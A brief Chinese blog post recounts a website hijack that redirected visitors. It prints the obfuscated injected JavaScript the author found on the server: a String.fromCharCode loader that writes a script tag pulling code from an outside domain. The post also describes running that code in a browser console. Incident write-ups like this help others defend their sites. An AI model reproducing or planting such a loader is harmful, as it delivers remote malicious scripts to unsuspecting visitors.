关于网站被注入病毒

关于网站被注入JS脚本

​ 震惊！今天老板告诉我，我们的网站被劫持了。具体体现为当我们点击某个链接进入详情页时不会跳转到详情页，而是跳转到一个不知名的网址。这怎么办呢？我脑海中涌现的第一个解决方案就是把服务器的代码下载下来，然后全局搜索这个网址。当然了，攻击的黑客咋会这么傻呢。于是我失败了。

于是我开始了我的第二个解决办法，在服务器上查找最近修改的文件，果然在一个文件当中，我找到了一个异常的JavaScript代码，具体如下:

var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,109,109,100,115,98,46,99,111,109,47,120,107,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt);

​ 我将其复制粘贴到浏览器控制台上执行，该脚本执行之后会生成一段script脚本，浏览器立马发出了警告，我将这段代码删除掉之后，网站立马正常运行了。

​ 在使用这个办法的时候，我将代码传输到本地的时候，本地的火绒安全中心还检测到了带有特洛伊病毒的木马，最初我以为将服务器的病毒文件删除之后就行了，没想到还是不行。于是才有了往后的解决办法。

​ 这是我第一次遇到病毒攻击，值得纪念一下。不知道还有没有其他的解决办法呢？小伙伴们可以留言告知我一下。